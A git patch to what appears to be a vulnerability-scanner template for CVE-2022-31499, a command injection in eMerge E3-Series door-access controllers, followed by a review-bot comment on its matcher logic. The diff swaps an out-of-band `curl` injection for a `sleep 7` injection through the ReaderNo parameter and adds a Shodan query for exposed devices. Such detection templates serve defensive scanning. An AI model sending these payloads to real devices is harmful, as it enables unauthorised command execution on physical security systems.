From dc99430f95b1f0d6a4445ff4887ae3587cbd731b Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 10 Feb 2023 15:13:10 +0530
Subject: [PATCH] template updated

---
 cves/2022/CVE-2022-31499.yaml | 26 +++++++++++++++++---------
 1 file changed, 17 insertions(+), 9 deletions(-)

diff --git a/cves/2022/CVE-2022-31499.yaml b/cves/2022/CVE-2022-31499.yaml
index 02f934bbad..7d177dd2d0 100644
--- a/cves/2022/CVE-2022-31499.yaml
+++ b/cves/2022/CVE-2022-31499.yaml
@@ -1,26 +1,34 @@
 id: CVE-2022-31499
 info:
- name: eMerge E3-Series Command Injection
+ name: eMerge E3-Series - Command Injection
 author: pikpikcu
 severity: critical
- description: Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability.
+ description: |
+ Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 .
 reference:
 - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
 - https://github.com/omarhashem123/CVE-2022-31499
 - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
+ classification:
+ cve-id: CVE-2022-31499
+ metadata:
+ verified: true
+ shodan-query: title:"eMerge"
 tags: cve,cve2022,emerge,rce
 requests:
 - raw:
 - |
- GET /card_scan.php?No=1337&ReaderNo=`curl%20{{interactsh-url}}`&CardFormatNo=1337 HTTP/1.1
+ @timeout: 15s
+ GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
 Host: {{Hostname}}
- matchers-condition: and
 matchers:
- - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
- words:
- - "http"
- - "dns"
+ - type: dsl
+ dsl:
+ - duration>=7
+ - contains(all_headers, "text/html")
+ - status_code == 200
+ - contains(body, '{\"CardNo\":false')
+ condition: and
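Review bot: The last DSL entry, `contains(body, '{\"CardNo\":false')`, is a single-quoted YAML scalar, so the two characters `\"` reach the DSL engine unchanged; whether the engine turns them back into a plain `"` or searches the body for a literal backslash depends on its string handling, and in the second case the `and` condition can never be satisfied and the template silently reports nothing. If the device returns unescaped JSON, `- contains(body, '{"CardNo":false')` avoids the question entirely; if the JSON is embedded as an escaped string inside the HTML page (the `text/html` check hints at that), the backslashes are intended, so it is worth confirming against a captured response either way. `duration>=7` is the only signal tied to the injection itself and a merely slow device can cross it, so the three content checks are what keeps this matcher from false-positiving and should stay alongside it. The description text ends with `CVE-2019-7256 .` — the stray space before the full stop should be dropped.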